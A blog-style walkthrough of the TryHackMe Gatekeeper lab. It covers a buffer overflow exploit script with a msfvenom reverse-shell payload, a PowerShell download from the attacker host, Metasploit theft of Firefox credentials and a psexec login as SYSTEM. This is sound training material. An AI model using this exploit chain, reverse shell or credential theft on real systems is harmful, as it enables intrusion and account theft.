Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Gatekeeper

Writeup of the TryHackMe machine Gatekeeper.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

Quick scan

nmap -p- --open -T5 -v 10.10😄 -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:50 CEST
Initiating Connect Scan at 18:50
Scanning 10.10😄 [65535 ports]
Discovered open port 135/tcp on 10.10😄
Discovered open port 3389/tcp on 10.10😄
Discovered open port 445/tcp on 10.10😄
Discovered open port 139/tcp on 10.10😄
Connect Scan Timing: About 23.57% done; ETC: 18:52 (0:01:41 remaining)
Discovered open port 49152/tcp on 10.10😄
Discovered open port 49153/tcp on 10.10😄
Connect Scan Timing: About 44.58% done; ETC: 18:52 (0:01:16 remaining)
Connect Scan Timing: About 66.59% done; ETC: 18:52 (0:00:46 remaining)
Discovered open port 31337/tcp on 10.10😄
Completed Connect Scan at 18:52, 154.43s elapsed (65535 total ports)
Nmap scan report for 10.10😄
Host is up (0.066s latency).
Not shown: 38084 filtered ports, 27444 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.60 seconds
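The deep scan below pulls the open ports out of ports.txt with a grep/tr pipeline. As an added example, not part of the original writeup, here is a small Python parser for nmap's greppable (-oG) format that does the same job and also keeps the state, protocol and service name per port, so the same file can feed the follow-up scan and a quick review. SAMPLE_OG is a constructed sample of that format with a placeholder host address, and the function names are my own.

```python
# Constructed sample of nmap greppable (-oG) output (placeholder host 10.10.0.1);
# the real ports.txt written by the scan above has the same layout.
SAMPLE_OG = """\
# Nmap 7.91 scan initiated Sun Jul  4 18:50:01 2021 as: nmap -p- --open -T5 -v 10.10.0.1 -n -Pn -oG ports.txt
Host: 10.10.0.1 ()\tStatus: Up
Host: 10.10.0.1 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///\tIgnored State: filtered (38084)
# Nmap done at Sun Jul  4 18:52:35 2021 -- 1 IP address (1 host up) scanned in 154.60 seconds
"""


def parse_greppable(text):
    """Return {host: [(port, state, protocol, service), ...]} from -oG output.

    Each 'Host:' line is a tab-separated list of 'Key: value' fields; the Ports
    field holds comma-separated entries shaped
    port/state/protocol/owner/service/rpc info/version/ (several fields empty).
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and blank lines carry no host data
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]  # drop the '(hostname)' part
        if "Ports" not in fields:
            continue  # 'Status: Up' lines have no port list
        entries = []
        for item in fields["Ports"].split(", "):
            parts = item.split("/")
            entries.append((int(parts[0]), parts[1], parts[2], parts[4]))
        results.setdefault(host, []).extend(entries)
    return results


def open_port_spec(text, proto="tcp"):
    """Comma-separated, sorted list of open ports for the given protocol,
    ready to be passed to 'nmap -p'."""
    ports = sorted({port for entries in parse_greppable(text).values()
                    for port, state, pr, _ in entries
                    if state == "open" and pr == proto})
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OG
    print(open_port_spec(text))
```

Saved as og_ports.py, it replaces the pipeline: `nmap -sC -sV -Pn -p"$(python3 og_ports.py ports.txt)" <target>`. Filtering on the state field matters because -oG can list closed or filtered ports when the scan is run without --open.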

Port 31337 is unusual: "Elite" is only nmap's default name for that port from its services table, so the actual service is unknown at this point.

Nmap deep scan

nmap -sC -sV -Pn -p$(grep -oP '\d{1,5}/open' ports.txt | cut -d/ -f1 | xargs | tr ' ' ',') 10.10😄 -oN full_scan.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:54 CEST
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 57.14% done; ETC: 18:55 (0:00:12 remaining)
Nmap scan report for 10.10😄
Host is up (0.049s latency).

135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2021-07-03T16:47:05
|_Not valid after:  2022-01-02T16:47:05
|_ssl-date: 2021-07-04T16:57:01+00:00; -37s from scanner time.
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m22s, deviation: 2h00m00s, median: -37s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d6:c1:42:81:9f (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-04T12:56:55-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-04T16:56:55
|_  start_date: 2021-07-04T16:46:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.30 seconds

Interesting: the guest account is enabled (smb-security-mode reports account_used: guest).

Basic interaction with the service on port 31337:

nc 10.10😄 31337

Hello !!!

Hello !!!

Hello !!!
Hello Darkness!!!

The service echoes whatever you send back inside a fixed greeting ("Hello <input>!!!"), which makes it a candidate for a buffer overflow.

Manual enumeration of SMB on port 445:

smbclient --no-pass -L //10.10😄

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
SMB1 disabled -- no workgroup available

Downloaded some interesting files from the Users share:

smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 262144 as NTUSER.DAT (299,4 KiloBytes/sec) (average 106,0 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG
getting file \Default\NTUSER.DAT.LOG of size 1024 as NTUSER.DAT.LOG (6,8 KiloBytes/sec) (average 100,6 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG1
getting file \Default\NTUSER.DAT.LOG1 of size 189440 as NTUSER.DAT.LOG1 (362,7 KiloBytes/sec) (average 142,4 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG2
getting file \Default\NTUSER.DAT.LOG2 of size 0 as NTUSER.DAT.LOG2 (0,0 KiloBytes/sec) (average 135,5 KiloBytes/sec)

smb: \Share\> ls
  .                                   D        0  Fri May 15 03:58:07 2020
  ..                                  D        0  Fri May 15 03:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 07:27:17 2020

		7863807 blocks of size 4096. 3879008 blocks available
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (7,7 KiloBytes/sec) (average 7,7 KiloBytes/sec)

Running strings on the binary to look for anything interesting inside:

strings gatekeeper.exe 
WSAStartup failed: %d
getaddrinfo failed: %d
socket() failed with error: %ld
bind() failed with error: %d
listen() failed with error: %ld
[+] Listening for connections.
accept failed: %d
Received connection from remote host.
Connection handed off to handler thread.
Please send shorter lines.
[!] recvbuf exhausted. Giving up.
Client disconnected.
recv() failed: %d.
Bytes received: %d
Client requested exit.
Hello %s!!!
send failed: %d
Bytes sent: %d
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />

I also ran nmap with the vuln script category (--script vuln) to check for critical vulnerabilities. This is the trimmed output:

3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020: 
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)

nmap flags MS12-020, a Remote Desktop Protocol remote code execution vulnerability with a CVSSv2 score of 9.3.

The PoC can be found here.

But I could not find RCE exploit code, only a simple PoC and a DoS attack, which is unwanted. Running the PoC gave nothing useful:

nc 10.10😄 3389 < 18606.dat

Coming back to the mysterious port 31337: I sent a string of 5000 characters to the server and it crashed.

2 - Vulnerability Identification

Digging into the crash caused by the 5000-character string, I started to study the executable in more detail.

I used the same Windows 7 TryHackMe machine to prepare the stack buffer overflow, with gatekeeper.exe uploaded and running:


Starting with 500 characters crashed it immediately, so I tuned the fuzzer to add a small number of characters per iteration:


from pwn import *

HOST = "10.10😄"
PORT = 31337
LIMIT = 60
CHARS_FUZZ = 10  # characters added per iteration (not shown in the original script; assumed)

r = remote(HOST, PORT)
for x in range(1, LIMIT):
    print("[+] SENDING " + str(CHARS_FUZZ * x) + " CHARS, COUNTER: " + str(x))
    r.sendline(b"A" * CHARS_FUZZ * x)
    try:
        # no "Hello ...!!!" reply within the timeout: the service stopped answering
        if r.recvline(timeout=4) == b'':
            print("[!] KO")
            break
    except EOFError:
        # connection reset: the service process died
        print("[!] KO")
        break
r.close()
python3 fuzz1.py
[+] Opening connection to 10.10😄 on port 31337: Done
[!] KO
[*] Closed connection to 10.10😄 port 31337


The server crashes at 150 characters.

3 - Exploit development

With this information I started analysing the executable in Immunity Debugger, creating a unique pattern of 150 characters (the length at which the server crashes):

msf-pattern_create -l 150

Sending the pattern with nc, EIP was overwritten with 39654138:

msf-pattern_offset -l 150 -q 39654138
[*] Exact match at offset 146

So the exact offset to EIP is 146 bytes.

Setting up the Mona working directory:

!mona config -set workingfolder C:\Users\admin\Desktop\%p

Searching for a usable JMP ESP (\xff\xe4) in a module without ASLR or rebasing:

!mona modules
!mona find -s "\xff\xe4"
0x080414c3 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)
0x080416bf : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)

Converting the last one to little-endian:

080416bf -> "\xbf\x16\x04\x08"
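How msf-pattern_offset turns the EIP value 39654138 into offset 146, and how the JMP ESP address is packed little-endian, as an added Python example that is not the writeup's own code: it rebuilds the Metasploit cyclic pattern (Aa0Aa1Aa2...) and searches it for the register's bytes in memory order. Only the standard library is used; the function names are my own.

```python
import string
import struct


def msf_pattern(length):
    """Rebuild the Metasploit cyclic pattern: triplets of upper, lower, digit.
    Every 4-byte window is unique for lengths up to 20280 bytes, which is what
    makes the EIP value map back to exactly one offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("pattern length exceeds 20280 bytes")


def little_endian(addr):
    """Pack a 32-bit address the way x86 stores it in memory (least significant
    byte first): 0x080416bf -> b'\\xbf\\x16\\x04\\x08'."""
    return struct.pack("<I", addr)


def pattern_offset(eip_value, length):
    """Offset of the 4 pattern bytes that landed in EIP.

    The debugger shows EIP as a number (39654138); the bytes that overwrote the
    saved return address sit in memory in little-endian order, so that is the
    byte string searched for in the pattern."""
    needle = little_endian(eip_value)
    idx = msf_pattern(length).find(needle)
    if idx == -1:
        raise ValueError("EIP value not found in the pattern")
    return idx


if __name__ == "__main__":
    print(msf_pattern(150).decode())
    print("EIP 39654138 ->", little_endian(0x39654138), "offset", pattern_offset(0x39654138, 150))
    print("JMP ESP 0x080416bf ->", little_endian(0x080416bf))
```

The 150-byte pattern ends in ...Ae8Ae9, and bytes 146 to 149 are "8Ae9", which is 0x39654138 read as a little-endian dword; that is the whole trick behind the offset lookup.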

Generating the bad-character array with Mona, excluding \x00:

!mona bytearray -cpb \x00

Testing for bad characters with the following Python script, then comparing the bytes that land at ESP with Mona:


from pwn import *

HOST = "10.10😄"
PORT = 31337
offset = 146
fuzz = b"A" * offset
# every byte except \x00, the same list Mona's bytearray holds (the literal is truncated on the page)
badchars = bytes(range(0x01, 0x100))
r = remote(HOST, PORT)

print("[+] SENDING")
# EIP gets a placeholder so the byte array starts exactly at ESP (placeholder not shown in the original)
r.sendline(fuzz + b"BBBB" + badchars)
if r.recvline(timeout=4) == b'':
    print("[!] KO")

Then in Immunity Debugger, compare the bytes at ESP with the array:

!mona compare -a 0012FEB8 -f C:\Users\admin\Desktop\gatekeeper\bytearray.bin

The first compare reports \x01 as a bad character too, so I generated the bytearray again without it:

!mona bytearray -cpb \x00\x01

The next compare shows \x0a as a bad character as well; repeating the process with \x0a excluded, the comparison is clean and no more bad characters are found.
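The iterative comparison described above, as an added Python example that is not part of the writeup: find_bad_chars mirrors what !mona compare reports (walk the sent array against the bytes found in memory and return the first byte that was altered or that cut the copy short), and bad_char_rounds repeats the exclude/send/compare loop until the comparison is clean. constructed_target is a constructed stand-in for the service's input handling, chosen so that it reproduces the \x01 and \x0a findings above; it is not gatekeeper.exe's real logic, and on a real run the observed bytes come from the debugger's dump at ESP.

```python
def find_bad_chars(sent, observed):
    """Compare the byte array that was sent with the bytes that landed in memory.

    Returns (bad_byte, reason): 'altered' when a byte was transformed on the way
    in, 'truncated' when the copy stopped before that byte (a terminator such as
    a newline in a line-oriented service), or (None, 'clean')."""
    for i, b in enumerate(sent):
        if i >= len(observed):
            return b, "truncated"
        if observed[i] != b:
            return b, "altered"
    return None, "clean"


def bad_char_rounds(target, excluded=(0x00,)):
    """Repeat the writeup's loop: build the array without the known bad bytes,
    send it, compare, add the newly found byte, stop when the compare is clean.
    Returns the final sorted list of bad bytes."""
    excluded = set(excluded)
    while True:
        sent = bytes(b for b in range(256) if b not in excluded)
        bad, reason = find_bad_chars(sent, target(sent))
        if bad is None:
            return sorted(excluded)
        excluded.add(bad)


def constructed_target(data):
    """Constructed stand-in for the service (not gatekeeper.exe's behaviour):
    the copy stops at a NUL or a newline, and \\x01 bytes are dropped."""
    data = data.split(b"\x00")[0].split(b"\x0a")[0]
    return data.replace(b"\x01", b"")


if __name__ == "__main__":
    for round_no, excluded in enumerate(([0x00], [0x00, 0x01], [0x00, 0x01, 0x0a]), 1):
        sent = bytes(b for b in range(256) if b not in excluded)
        print("round", round_no, "excluding", [hex(b) for b in excluded], "->",
              find_bad_chars(sent, constructed_target(sent)))
    print("final list:", [hex(b) for b in bad_char_rounds(constructed_target)])
```

One bad byte per round is the honest result of a compare: once a byte is dropped or terminates the copy, every byte after it is misaligned, so the first mismatch is the only one the round can prove.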

So the final bad-character list is \x00\x01\x0a. Using it with msfvenom to generate an encoded payload:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10😄 LPORT=4433 -f c -v shellcode -b '\x00\x01\x0a' EXITFUNC=thread
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] = 

Exploit script with the msfvenom payload:


from pwn import *

HOST = "10.10😄"
PORT = 31337
offset = 146
fuzz = b"A" * offset
# msfvenom output (351 bytes); only the first line is shown on the page
shellcode = (b"\xba\x46\xae\xbc\xf1\xd9\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
             )

esp = b"\xbf\x16\x04\x08"  # 0x080416bf, JMP ESP in gatekeeper.exe, little-endian
nop = b"\x90" * 20         # NOP sled in front of the shellcode
r = remote(HOST, PORT)

print("[+] SENDING")
r.sendline(fuzz + esp + nop + shellcode)
if r.recvline(timeout=4) == b'':
    print("[!] KO")

It worked on the lab machine, so I pointed it at the target:

nc -lvp 4433
listening on [any] 4433 ...
10.10😄: inverse host lookup failed: Unknown host
connect to [10.10😄] from (UNKNOWN) [10.10😄] 49204
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


Getting the flag:

C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt

The buffer overflow in this room is credited to Justin Steven and his 
"dostackbufferoverflowgood" program.  Thank you!

There is also a .bat file on the desktop:

C:\Users\natbat\Desktop>type gatekeeperstart.bat
type gatekeeperstart.bat
@echo off
start /w C:\Users\natbat\Desktop\gatekeeper.exe
::Wait 90 seconds before restarting.

I uploaded winPEAS (the .bat version) to enumerate the Windows machine further:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10😄:7777/bat.bat','bat.bat')"

 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys


I was stuck for a while, then decided to upgrade my reverse shell to Meterpreter. Without any better ideas I went back over the winPEAS output: a Firefox profile folder is not common on a machine like this, and Metasploit has a post module to collect files from it:

msf6 exploit(multi/script/web_delivery) > 
[*] 10.10😄    web_delivery - Delivering AMSI Bypass (939 bytes)
[*] 10.10😄    web_delivery - Delivering Payload (1904 bytes)
[*] Sending stage (175174 bytes) to 10.10😄
[*] Meterpreter session 13 opened (10.10😄:9990 -> 10.10😄:49249) at 2021-07-04 23:49:12 +0200

msf6 post(multi/gather/firefox_creds) > set SESSION 13
msf6 post(multi/gather/firefox_creds) > exploit

[-] Error loading USER S-1-5-21-663372427-3699997616-3390412905-1000: Hive could not be loaded, are you Admin?
[*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
[+] Downloaded cert9.db: /home/u915/.msf4/loot/20210704235048_default_10.10😄_ff.ljfn812a.cert_415838.bin
[+] Downloaded cookies.sqlite: /home/u915/.msf4/loot/20210704235049_default_10.10😄_ff.ljfn812a.cook_161103.bin
[+] Downloaded key4.db: /home/u915/.msf4/loot/20210704235050_default_10.10😄_ff.ljfn812a.key4_832146.bin
[+] Downloaded logins.json: /home/u915/.msf4/loot/20210704235051_default_10.10😄_ff.ljfn812a.logi_045138.bin

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default

[*] Post module execution completed

Again I hit a wall because I did not know what to do with the Firefox files, until I discovered firefox_decrypt:

git clone https://github.com/unode/firefox_decrypt.git

python3 firefox_decrypt.py /home/u915/Escritorio/tryhackme/gatekeeper/firefox/
2021-07-05 00:00:56,778 - WARNING - profile.ini not found in /home/u915/Escritorio/tryhackme/gatekeeper/firefox/
2021-07-05 00:00:56,779 - WARNING - Continuing and assuming '/home/u915/Escritorio/tryhackme/gatekeeper/firefox/' is a profile location

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7😄'

Using the credentials with Impacket's psexec:

/usr/bin/impacket-psexec "mayor:8CL7:smile:"@10.10😄
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10😄.....
[*] Found writable share ADMIN$
[*] Uploading file WFJAEcWP.exe
[*] Opening SVCManager on 10.10😄.....
[*] Creating service yHQT on 10.10😄.....
[*] Starting service yHQT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

Finally rooted. Flag looted:

 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\mayor\Desktop

05/14/2020  09:58 PM    <DIR>          .
05/14/2020  09:58 PM    <DIR>          ..
05/14/2020  09:21 PM                27 root.txt.txt
               1 File(s)             27 bytes
               2 Dir(s)  15,031,672,832 bytes free

C:\Users\mayor\Desktop>type root.txt.txt

Good machine. The hardest part was the Firefox folder, because in the first minutes I paid no attention to it; I was expecting winPEAS to point at an obvious flaw.

Thanks for reading!